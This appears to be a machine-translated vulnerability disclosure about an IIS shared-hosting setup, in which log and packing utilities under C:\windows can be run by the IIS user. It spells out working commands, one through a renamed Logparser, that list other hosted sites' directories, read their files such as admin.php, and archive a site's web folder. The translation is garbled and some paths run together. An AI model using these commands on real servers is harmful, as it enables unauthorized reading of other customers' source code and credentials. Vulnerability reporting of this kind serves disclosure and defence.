Extraterrestrial virtual Host read file vulnerability across directory, need certain conditions.
The problem occurs in the following files, which do not have strict set execution permissions and that the current IIS users can successfully execute commands:
C:\windows\7i24iislog.exec:\windows\7i24iislog2.exec:\windows\7i24iislog3.exec:\windows\7i24iislog4.exec:\ Windows\7i24tool.exec:\windows\rsb.exe
These files seem to be out-of-process logs, set permissions, in which the 7i24IISLOG.exe is actually Logparser,logparser is a powerful log analysis tool, the following use it to column Web directories:
C:\windows\7i24IISLOG "select top path from E:\host\*.*" -i:fs-rtp:-1
Return as follows:
Read directory information for one of the stations:
C:\windows\7i24IISLOG "Select top path from E:\host\0233ab\*.*"-i:fs-rtp:-1
Read the file contents below:
C:\windows\7i24IISLOG "Select text from e:\host\0233ab\web\admin.php"-i:textline-rtp:-1
7i24IISLOG3.exe can package an ISO file and use it to also list directory file information:
C:\windows\7i24IISLOG3 e:\host\0233ab\web\ C:\windows\temp\123.rar
and the same rbs.exe.
C:\windows\rbs-r-V 024DBJJ e:\host\0233ab\web\*.*
Extraterrestrial Virtual Host cross-Web directory file Read vulnerability